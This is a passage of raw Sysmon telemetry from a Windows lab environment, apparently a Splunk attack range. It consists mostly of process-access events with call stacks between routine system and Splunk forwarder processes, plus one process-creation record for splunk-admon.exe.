c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.234{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.234{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.234{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000214873Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.366{4F8D34B0-0F2D-6216-1104-000000003902}22643196C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214872Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.147{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F2D-6216-1104-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214871Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214870Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214869Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214868Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214867Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214866Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214865Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214864Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214863Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.147{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214862Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.147{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0F2D-6216-1104-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214861Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.147{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F2D-6216-1104-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214860Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:45.148{4F8D34B0-0F2D-6216-1104-000000003902}2264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000285856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.188{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-0F2D-6216-C304-000000003802}2216C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.188{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-0F2D-6216-C304-000000003802}2216C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.188{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-0F2D-6216-C304-000000003802}2216C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.172{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-0F2D-6216-C304-000000003802}2216C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.172{C8EA50B7-F2AD-6215-B800-000000003802}43483224C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+2fc27|C:\Windows\system32\windows.cortana.Desktop.dll+2fb6b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.172{C8EA50B7-F2AD-6215-B800-000000003802}43483224C:\Windows\System32\RuntimeBroker.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\System32\combase.dll+621bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+2fb01|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+ae95a|C:\Windows\System32\combase.dll+a571d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54179|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65313|C:\Windows\System32\combase.dll+64fc2|C:\Windows\System32\combase.dll+638d8|C:\Windows\System32\combase.dll+6165d|C:\Windows\System32\combase.dll+60d2f|C:\Windows\System32\combase.dll+7c239|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd 10341000x8000000000000000285850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.172{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0F2D-6216-C304-000000003802}2216C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:45.172{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-0F2D-6216-C304-000000003802}2216C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+366d9|c:\windows\system32\rpcss.dll+3bec2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 